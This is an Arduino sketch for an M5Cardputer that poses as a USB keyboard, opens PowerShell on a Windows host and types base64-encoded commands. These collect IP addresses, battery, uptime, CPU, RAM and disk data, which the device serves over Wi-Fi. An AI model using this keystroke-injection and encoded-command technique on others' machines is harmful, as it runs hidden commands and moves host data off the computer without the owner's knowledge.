#include <M5Cardputer.h>
#include <USBHIDKeyboard.h>
#include <WiFi.h>
#include <ESPAsyncWebServer.h>
#include <SD.h>
#include <Ticker.h>

AsyncWebServer server(80);
USBHIDKeyboard Keyboard;

// Screen blanking Ticker variables
Ticker blankTicker;
bool screenBlanked = false;

// Global Wi-Fi credentials
String STA_SSID;
String STA_PASS;
String AP_SSID;
String AP_PASS;
String AP_CH;

//Some other global variables
String PORT = "NULL";
String layout = "NULL";
String serialData = "NULL";
bool qwertz = false;
bool getUpdate = false;
bool apMode = false;


//Format const char pointer so it works on qwertz keyboards
void sendQwertz(const char* str) {
  for (int i = 0; str[i] != '\0'; i++) {
    if (str[i] == 'Z') {Keyboard.write('Y');}
    else if (str[i] == 'z') {Keyboard.write('y');}
    else if (str[i] == 'Y') {Keyboard.write('Z');}
    else if (str[i] == 'y') {Keyboard.write('z');}
    else if (str[i] == '-') {Keyboard.write('/');}
    else if (str[i] == '=') {Keyboard.write(')');}
    else {Keyboard.write(str[i]);}
  }
}


//Clear screen and write basic info
void cls() {
  M5Cardputer.Display.clear();
  M5Cardputer.Display.setCursor(0, 0);
  M5.Lcd.print("ServerIP: ");
  if (apMode) {
    M5.Lcd.println(WiFi.softAPIP());
  } else {
    M5.Lcd.println(WiFi.localIP());
  }
  M5.Lcd.println();
  M5.Lcd.println("PORT=" + PORT);
  M5.Lcd.println("LAYOUT=" + layout);
  M5.Lcd.println();
}


//Load Wi-Fi credentials from SD card
void loadWiFiCreds() {
  File f = SD.open("/DataServer/creds.txt");
  if (!f) {
    M5.Lcd.println("WiFi: FAILED (no creds.txt)\nExecution stopped.");
    while (true) delay(1000);
  }

  while (f.available()) {
    String line = f.readStringUntil('\n');
    line.trim();
    if (line.startsWith("STA_SSID=")) STA_SSID = line.substring(9);
    else if (line.startsWith("STA_PASS=")) STA_PASS = line.substring(9);
    else if (line.startsWith("AP_SSID=")) AP_SSID = line.substring(8);
    else if (line.startsWith("AP_PASS=")) AP_PASS = line.substring(8);
    else if (line.startsWith("AP_CH=")) AP_CH = line.substring(6);
  }

  f.close();
  if (STA_SSID.length() == 0 || STA_PASS.length() == 0 || AP_SSID.length() == 0 || AP_PASS.length() == 0 || AP_CH.length() == 0) {
    M5.Lcd.println("WiFi: FAILED (incomplete creds.txt)\nExecution stopped.");
    while (true) delay(1000);
  } else {
    M5.Lcd.println("WiFi: creds.txt LOADED");
  }
}


//Start WiFi based on the apMode "flag" (just a regular bool)
void setupWiFi(bool apMode) {
  if (apMode) {
    // AP MODE
    M5.Lcd.println("WiFi: AP-MODE");
    WiFi.mode(WIFI_AP);
    int channel = AP_CH.toInt();
    if (channel < 1 || channel > 13) channel = 6;  // default channel
    WiFi.softAP(AP_SSID.c_str(), AP_PASS.c_str(), channel);
  } else {
    // STA MODE
    WiFi.mode(WIFI_STA);
    M5.Lcd.println("WiFi: STA-MODE");
    M5.Lcd.print("WiFi: Connecting to ");
    M5.Lcd.print(STA_SSID);
    WiFi.begin(STA_SSID.c_str(), STA_PASS.c_str());
    unsigned long start = millis();
    while (WiFi.status() != WL_CONNECTED) {
      delay(1000);
      M5.Lcd.print(".");
      if (millis() - start > 20000) {
        M5.Lcd.println("\nWiFi: FAILED (connection err)\nExecution stopped.");
        while (true) delay(1000);
      }
    }
    M5.Lcd.println();
  }
}



void setup() {
  M5.begin();
  Keyboard.begin();
  Serial.begin(9600);
  Serial.setTimeout(100);
  M5.Lcd.println("Fetching device info...");


  //Listen for incoming PORT name (PORT detection)
  for (int i = 0; i <= 50; i++) {
    delay(100);
    if (Serial.available()) {PORT = Serial.readStringUntil('\n');}
    if (PORT != "NULL") {break;}
  }
  M5.Lcd.println("PORT=" + PORT);


  //Open powershell
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(500);
  Keyboard.releaseAll();
  delay(1000);
  Keyboard.print("powershell");
  delay(100);
  Keyboard.write(KEY_RETURN);
  delay(2000);


  if (PORT == "NULL") {
    //PORT detection QWERTY
    Keyboard.print("powershell -EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAKACQAaQBuAGkAdABpAGEAbABQAG8AcgB0AHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAbwByAHQAcwAuAFMAZQByAGkAYQBsAFAAbwByAHQAXQA6ADoARwBlAHQAUABvAHIAdABOAGEAbQBlAHMAKAApAAoAZQBjAGgAbwAgACIASQBuAGkAdABpAGEAbABQAG8AcgB0AHMAOgAiACAAJABpAG4AaQB0AGkAYQBsAFAAbwByAHQAcwAKAHcAaABpAGwAZQAgACgAIQAkAG4AZQB3AFAAbwByAHQAKQAgAHsACgAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAA1ADAAMAAKAAkAJABjAHUAcgByAGUAbgB0AFAAbwByAHQAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABvAHIAdABzAC4AUwBlAHIAaQBhAGwAUABvAHIAdABdADoAOgBHAGUAdABQAG8AcgB0AE4AYQBtAGUAcwAoACkACgAJACQAbgBlAHcAUABvAHIAdAAgAD0AIAAkAGMAdQByAHIAZQBuAHQAUABvAHIAdABzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAC0AbgBvAHQAaQBuACAAJABpAG4AaQB0AGkAYQBsAFAAbwByAHQAcwAgAH0ACgB9AAoAZQBjAGgAbwAgACIAQwB1AHIAcgBlAG4AdABQAG8AcgB0AHMAOgAiACAAJABjAHUAcgByAGUAbgB0AFAAbwByAHQAcwAKAGUAYwBoAG8AIAAiAE4AZQB3AFAAbwByAHQAOgAiACAAJABuAGUAdwBQAG8AcgB0AAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAKACQAcABvAHIAdAAgAD0AIABuAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAG8AcgB0AHMALgBTAGUAcgBpAGEAbABQAG8AcgB0ACAAJABuAGUAdwBQAG8AcgB0ACwAOQA2ADAAMAAsAE4AbwBuAGUALAA4ACwAbwBuAGUACgAkAHAAbwByAHQALgBPAHAAZQBuACgAKQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACQAbgBlAHcAUABvAHIAdAApAAoAJABwAG8AcgB0AC4AQwBsAG8AcwBlACgAKQA=");
    delay(100);
    Keyboard.write(KEY_RETURN);
    delay(100);

    //PORT detection QWERTZ
    sendQwertz("powershell -EncodedCommand UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAKACQAaQBuAGkAdABpAGEAbABQAG8AcgB0AHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAbwByAHQAcwAuAFMAZQByAGkAYQBsAFAAbwByAHQAXQA6ADoARwBlAHQAUABvAHIAdABOAGEAbQBlAHMAKAApAAoAZQBjAGgAbwAgACIASQBuAGkAdABpAGEAbABQAG8AcgB0AHMAOgAiACAAJABpAG4AaQB0AGkAYQBsAFAAbwByAHQAcwAKAHcAaABpAGwAZQAgACgAIQAkAG4AZQB3AFAAbwByAHQAKQAgAHsACgAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAA1ADAAMAAKAAkAJABjAHUAcgByAGUAbgB0AFAAbwByAHQAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABvAHIAdABzAC4AUwBlAHIAaQBhAGwAUABvAHIAdABdADoAOgBHAGUAdABQAG8AcgB0AE4AYQBtAGUAcwAoACkACgAJACQAbgBlAHcAUABvAHIAdAAgAD0AIAAkAGMAdQByAHIAZQBuAHQAUABvAHIAdABzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAC0AbgBvAHQAaQBuACAAJABpAG4AaQB0AGkAYQBsAFAAbwByAHQAcwAgAH0ACgB9AAoAZQBjAGgAbwAgACIAQwB1AHIAcgBlAG4AdABQAG8AcgB0AHMAOgAiACAAJABjAHUAcgByAGUAbgB0AFAAbwByAHQAcwAKAGUAYwBoAG8AIAAiAE4AZQB3AFAAbwByAHQAOgAiACAAJABuAGUAdwBQAG8AcgB0AAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAKACQAcABvAHIAdAAgAD0AIABuAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAG8AcgB0AHMALgBTAGUAcgBpAGEAbABQAG8AcgB0ACAAJABuAGUAdwBQAG8AcgB0ACwAOQA2ADAAMAAsAE4AbwBuAGUALAA4ACwAbwBuAGUACgAkAHAAbwByAHQALgBPAHAAZQBuACgAKQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACQAbgBlAHcAUABvAHIAdAApAAoAJABwAG8AcgB0AC4AQwBsAG8AcwBlACgAKQA=");
    delay(100);
    Keyboard.write(KEY_RETURN);
    delay(100);

    Keyboard.print("exit");
    Keyboard.write(KEY_RETURN);
    delay(100);

    esp_deep_sleep(9000000);
  }


  //QWERTY TEST
  Keyboard.print("powershell -EncodedCommand JABwAG8AcgB0AE4AYQBtAGUAIAA9ACAAUgBlAGEAZAAtAEgAbwBzAHQACgAkAHAAbwByAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABvAHIAdABzAC4AUwBlAHIAaQBhAGwAUABvAHIAdAAgACQAcABvAHIAdABOAGEAbQBlACwAOQA2ADAAMAAsAE4AbwBuAGUALAA4ACwAbwBuAGUACgAkAHAAbwByAHQALgBPAHAAZQBuACgAKQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAcQB3AGUAcgB0AHkAIgApAAoAJABwAG8AcgB0AC4AQwBsAG8AcwBlACgAKQA=");
  delay(100);
  Keyboard.write(KEY_RETURN);
  delay(1000);
  Keyboard.print(PORT);
  delay(100);
  Keyboard.write(KEY_RETURN);
  delay(100);

  //QWERTZ TEST
  sendQwertz("powershell -EncodedCommand JABwAG8AcgB0AE4AYQBtAGUAIAA9ACAAUgBlAGEAZAAtAEgAbwBzAHQACgAkAHAAbwByAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABvAHIAdABzAC4AUwBlAHIAaQBhAGwAUABvAHIAdAAgACQAcABvAHIAdABOAGEAbQBlACwAOQA2ADAAMAAsAE4AbwBuAGUALAA4ACwAbwBuAGUACgAkAHAAbwByAHQALgBPAHAAZQBuACgAKQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAcQB3AGUAcgB0AHoAIgApAAoAJABwAG8AcgB0AC4AQwBsAG8AcwBlACgAKQA=");
  delay(100);
  Keyboard.write(KEY_RETURN);
  delay(1000);
  Keyboard.print(PORT);
  delay(100);
  Keyboard.write(KEY_RETURN);
  delay(100);

  Keyboard.print("exit");
  Keyboard.write(KEY_RETURN);
  delay(100);


  //Set keyboard layout "flag" (just a regular bool)
  while (!Serial.available()) {delay(100);}
  layout = Serial.readStringUntil('\n');
  if (layout == "qwertz") {qwertz = true;}
  M5.Lcd.println("LAYOUT=" + layout);
  M5.Lcd.println("Done.");
  M5.Lcd.println();


  //Check for 5 seconds if G0 (BtnA) is pressed --> if it is turn on AP MODE
  M5.Lcd.print("Press G0 to start AP-MODE (");
  unsigned long t = millis();
  bool firstNUM = true;
  int countOldValue = 6;
  while (millis() - t < 6000 && apMode == false && countOldValue != 0) {
    M5.update();
    if (M5.BtnA.isPressed()) {apMode = true;}
    int count = (6000 - (millis() - t)) / 1000;
    if (count != countOldValue) {
      countOldValue = count;
      if (!firstNUM) M5.Lcd.print(" ");
      M5.Lcd.print(countOldValue);
      if (countOldValue == 1) countOldValue = 0;
      firstNUM = false;
    }
  }
  M5.Lcd.println(")");
  M5.Lcd.println();


  // SD mount
  if (!SD.begin()) {
    M5.Lcd.println("SD: mount FAILED\nExecution stopped.");
    while (true) delay(1000);
  }
  M5.Lcd.println("SD: MOUNTED");


  // Loading creds and setting up WiFi
  loadWiFiCreds();
  setupWiFi(apMode);


  //Serve index.html
  server.on("/", HTTP_GET, [](AsyncWebServerRequest *request){
    request->send(SD, "/DataServer/index.html", "text/html");
  });


  //Serve data at /data
  server.on("/data", HTTP_GET, [](AsyncWebServerRequest *request){
    request->send(200, "text/plain", serialData);
  });


  //Set getUpdate "flag" (just a regular bool) on /refresh
  server.on("/refresh", HTTP_GET, [](AsyncWebServerRequest *request){
    getUpdate = true;
    request->send(200, "text/plain", "OK");
  });


  //Restart ESP32 on /restart
  server.on("/restart", HTTP_GET, [](AsyncWebServerRequest *request){
    request->send(200, "text/plain", "OK");
    ESP.restart();
  });


  //Start server
  server.begin();
  M5.Lcd.println("Server started!");
  M5.Lcd.println();
  M5.Lcd.print("ServerIP: ");
  if (apMode) {
    M5.Lcd.println(WiFi.softAPIP());
  } else {
    M5.Lcd.println(WiFi.localIP());
  }


  // Start Ticker for screen StandBy
  blankTicker.once(60, []() {
    screenBlanked = true;
    M5.Lcd.sleep();
  });
}



void loop() {
  M5.update();


  //Get update
  if (getUpdate) {
    getUpdate = false;
    serialData.clear();
    cls();


    //Open powershell
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.press('r');
    delay(500);
    Keyboard.releaseAll();
    delay(1000);
    Keyboard.print("powershell");
    delay(100);
    Keyboard.write(KEY_RETURN);
    delay(2000);


    if (qwertz) {
      sendQwertz("powershell -EncodedCommand JABwAG8AcgB0AE4AYQBtAGUAIAA9ACAAUgBlAGEAZAAtAEgAbwBzAHQACgAkAHAAbwByAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABvAHIAdABzAC4AUwBlAHIAaQBhAGwAUABvAHIAdAAgACQAcABvAHIAdABOAGEAbQBlACwAOQA2ADAAMAAsAE4AbwBuAGUALAA4ACwAbwBuAGUACgAkAHAAbwByAHQALgBPAHAAZQBuACgAKQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAkAGkAcABBAGQAZAByAGUAcwBzAGUAcwAgAD0AIABHAGUAdAAtAEMAaQBtAEkAbgBzAHQAYQBuAGMAZQAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAKAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEkAUABBAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAIAB9ACAAfAAKAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBJAFAAQQBkAGQAcgBlAHMAcwAgAH0AIAB8AAoAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfACAALQBtAGEAdABjAGgAIAAnAF4AXABkAHsAMQAsADMAfQAoAFwALgBcAGQAewAxACwAMwB9ACkAewAzAH0AJAAnACAAfQAKAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAQQBkAGQAcgBlAHMAcwBlAHMAKQAgAHsACgAJACQAcABvAHIAdAAuAFcAcgBpAHQAZQBMAGkAbgBlACgAIgBJAFAAdgA0AD0AIgAgACsAIAAkAGkAcAApAAoAfQAKACQAYwB1AHIAcgBlAG4AdABUAGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAAiAEgASAA6AG0AbQA6AHMAcwAiAAoAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAFQAaQBtAGUAPQAiACAAKwAgACQAYwB1AHIAcgBlAG4AdABUAGkAbQBlACkACgAkAGIAYQB0AHQAZQByAHkAIAA9ACAARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBCAGEAdAB0AGUAcgB5AAoAaQBmACAAKAAkAGIAYQB0AHQAZQByAHkAKQAgAHsACgAJACQAcABvAHIAdAAuAFcAcgBpAHQAZQBMAGkAbgBlACgAIgBCAGEAdAB0AGUAcgB5AD0AIgAgACsAIAAkAGIAYQB0AHQAZQByAHkALgBFAHMAdABpAG0AYQB0AGUAZABDAGgAYQByAGcAZQBSAGUAbQBhAGkAbgBpAG4AZwApAAoAfQAgAGUAbABzAGUAIAB7AAoACQAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAQgBhAHQAdABlAHIAeQA9AE4AQQAiACkACgB9AAoAJABsAGEAcwB0AEIAbwBvAHQAIAA9ACAARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUACgAkAHUAcAB0AGkAbQBlACAAPQAgAFsAbQBhAHQAaABdADoAOgBSAG8AdQBuAGQAKAAoACgARwBlAHQALQBEAGEAdABlACkAIAAtACAAJABsAGEAcwB0AEIAbwBvAHQAKQAuAFQAbwB0AGEAbABIAG8AdQByAHMALAAxACkACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAVQBwAHQAaQBtAGUAPQAiACAAKwAgACQAdQBwAHQAaQBtAGUAKQAKACQAYwBwAHUAIAA9ACAAKABHAGUAdAAtAEMAaQBtAEkAbgBzAHQAYQBuAGMAZQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAbwByACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEwAbwBhAGQAUABlAHIAYwBlAG4AdABhAGcAZQApAAoAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAEMAUABVAD0AIgAgACsAIAAkAGMAcAB1ACkACgAkAHIAYQBtACAAPQAgAEcAZQB0AC0AQwBpAG0ASQBuAHMAdABhAG4AYwBlACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0ACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIARgByAGUAZQBSAEEATQA9ACIAIAArACAAWwBtAGEAdABoAF0AOgA6AFIAbwB1AG4AZAAoACQAcgBhAG0ALgBGAHIAZQBlAFAAaAB5AHMAaQBjAGEAbABNAGUAbQBvAHIAeQAgAC8AIAAxAE0AQgAsACAAMgApACkACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAVABvAHQAYQBsAFIAQQBNAD0AIgAgACsAIABbAG0AYQB0AGgAXQA6ADoAUgBvAHUAbgBkACgAJAByAGEAbQAuAFQAbwB0AGEAbABWAGkAcwBpAGIAbABlAE0AZQBtAG8AcgB5AFMAaQB6AGUAIAAvACAAMQBNAEIALAAgADIAKQApAAoARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBMAG8AZwBpAGMAYQBsAEQAaQBzAGsAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAEQAaQBzAGsASQBEAD0AIgAgACsAIAAkAF8ALgBEAGUAdgBpAGMAZQBJAEQAKQAKAAkAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAEYAcgBlAGUAUwBwAGEAYwBlAD0AIgAgACsAIABbAG0AYQB0AGgAXQA6ADoAUgBvAHUAbgBkACgAJABfAC4ARgByAGUAZQBTAHAAYQBjAGUAIAAvACAAMQBHAEIALAAgADIAKQApAAoACQAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAVABvAHQAYQBsAFMAaQB6AGUAPQAiACAAKwAgAFsAbQBhAHQAaABdADoAOgBSAG8AdQBuAGQAKAAkAF8ALgBTAGkAegBlACAALwAgADEARwBCACwAIAAyACkAKQAKAH0ACgAkAHAAbwByAHQALgBDAGwAbwBzAGUAKAApAA==");
      delay(100);
      Keyboard.write(KEY_RETURN);
      delay(1000);
      Keyboard.print(PORT);
      delay(100);
      Keyboard.write(KEY_RETURN);
      delay(100);
      Keyboard.print("exit");
      Keyboard.write(KEY_RETURN);
      delay(100);
    } else {
      Keyboard.print("powershell -EncodedCommand JABwAG8AcgB0AE4AYQBtAGUAIAA9ACAAUgBlAGEAZAAtAEgAbwBzAHQACgAkAHAAbwByAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABvAHIAdABzAC4AUwBlAHIAaQBhAGwAUABvAHIAdAAgACQAcABvAHIAdABOAGEAbQBlACwAOQA2ADAAMAAsAE4AbwBuAGUALAA4ACwAbwBuAGUACgAkAHAAbwByAHQALgBPAHAAZQBuACgAKQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAkAGkAcABBAGQAZAByAGUAcwBzAGUAcwAgAD0AIABHAGUAdAAtAEMAaQBtAEkAbgBzAHQAYQBuAGMAZQAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAKAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEkAUABBAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAIAB9ACAAfAAKAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBJAFAAQQBkAGQAcgBlAHMAcwAgAH0AIAB8AAoAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfACAALQBtAGEAdABjAGgAIAAnAF4AXABkAHsAMQAsADMAfQAoAFwALgBcAGQAewAxACwAMwB9ACkAewAzAH0AJAAnACAAfQAKAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAQQBkAGQAcgBlAHMAcwBlAHMAKQAgAHsACgAJACQAcABvAHIAdAAuAFcAcgBpAHQAZQBMAGkAbgBlACgAIgBJAFAAdgA0AD0AIgAgACsAIAAkAGkAcAApAAoAfQAKACQAYwB1AHIAcgBlAG4AdABUAGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAAiAEgASAA6AG0AbQA6AHMAcwAiAAoAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAFQAaQBtAGUAPQAiACAAKwAgACQAYwB1AHIAcgBlAG4AdABUAGkAbQBlACkACgAkAGIAYQB0AHQAZQByAHkAIAA9ACAARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBCAGEAdAB0AGUAcgB5AAoAaQBmACAAKAAkAGIAYQB0AHQAZQByAHkAKQAgAHsACgAJACQAcABvAHIAdAAuAFcAcgBpAHQAZQBMAGkAbgBlACgAIgBCAGEAdAB0AGUAcgB5AD0AIgAgACsAIAAkAGIAYQB0AHQAZQByAHkALgBFAHMAdABpAG0AYQB0AGUAZABDAGgAYQByAGcAZQBSAGUAbQBhAGkAbgBpAG4AZwApAAoAfQAgAGUAbABzAGUAIAB7AAoACQAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAQgBhAHQAdABlAHIAeQA9AE4AQQAiACkACgB9AAoAJABsAGEAcwB0AEIAbwBvAHQAIAA9ACAARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUACgAkAHUAcAB0AGkAbQBlACAAPQAgAFsAbQBhAHQAaABdADoAOgBSAG8AdQBuAGQAKAAoACgARwBlAHQALQBEAGEAdABlACkAIAAtACAAJABsAGEAcwB0AEIAbwBvAHQAKQAuAFQAbwB0AGEAbABIAG8AdQByAHMALAAxACkACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAVQBwAHQAaQBtAGUAPQAiACAAKwAgACQAdQBwAHQAaQBtAGUAKQAKACQAYwBwAHUAIAA9ACAAKABHAGUAdAAtAEMAaQBtAEkAbgBzAHQAYQBuAGMAZQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAbwByACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEwAbwBhAGQAUABlAHIAYwBlAG4AdABhAGcAZQApAAoAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAEMAUABVAD0AIgAgACsAIAAkAGMAcAB1ACkACgAkAHIAYQBtACAAPQAgAEcAZQB0AC0AQwBpAG0ASQBuAHMAdABhAG4AYwBlACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0ACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIARgByAGUAZQBSAEEATQA9ACIAIAArACAAWwBtAGEAdABoAF0AOgA6AFIAbwB1AG4AZAAoACQAcgBhAG0ALgBGAHIAZQBlAFAAaAB5AHMAaQBjAGEAbABNAGUAbQBvAHIAeQAgAC8AIAAxAE0AQgAsACAAMgApACkACgAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAVABvAHQAYQBsAFIAQQBNAD0AIgAgACsAIABbAG0AYQB0AGgAXQA6ADoAUgBvAHUAbgBkACgAJAByAGEAbQAuAFQAbwB0AGEAbABWAGkAcwBpAGIAbABlAE0AZQBtAG8AcgB5AFMAaQB6AGUAIAAvACAAMQBNAEIALAAgADIAKQApAAoARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBMAG8AZwBpAGMAYQBsAEQAaQBzAGsAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAEQAaQBzAGsASQBEAD0AIgAgACsAIAAkAF8ALgBEAGUAdgBpAGMAZQBJAEQAKQAKAAkAJABwAG8AcgB0AC4AVwByAGkAdABlAEwAaQBuAGUAKAAiAEYAcgBlAGUAUwBwAGEAYwBlAD0AIgAgACsAIABbAG0AYQB0AGgAXQA6ADoAUgBvAHUAbgBkACgAJABfAC4ARgByAGUAZQBTAHAAYQBjAGUAIAAvACAAMQBHAEIALAAgADIAKQApAAoACQAkAHAAbwByAHQALgBXAHIAaQB0AGUATABpAG4AZQAoACIAVABvAHQAYQBsAFMAaQB6AGUAPQAiACAAKwAgAFsAbQBhAHQAaABdADoAOgBSAG8AdQBuAGQAKAAkAF8ALgBTAGkAegBlACAALwAgADEARwBCACwAIAAyACkAKQAKAH0ACgAkAHAAbwByAHQALgBDAGwAbwBzAGUAKAApAA==");
      delay(100);
      Keyboard.write(KEY_RETURN);
      delay(1000);
      Keyboard.print(PORT);
      delay(100);
      Keyboard.write(KEY_RETURN);
      delay(100);
      Keyboard.print("exit");
      Keyboard.write(KEY_RETURN);
      delay(100);
    }
  }


  //Check for serial data
  while (Serial.available()) {
    String line = Serial.readStringUntil('\n');
    serialData += line + "\n";
    M5.Lcd.println(line);
  }


  //Screen timeout
  if (screenBlanked && (M5.BtnA.wasPressed())) {
    screenBlanked = false;
    M5.Lcd.wakeup();
    // reset blank timer
    blankTicker.detach();
    blankTicker.once(60, []() {
      screenBlanked = true;
      M5.Lcd.sleep();
    });
  }
}
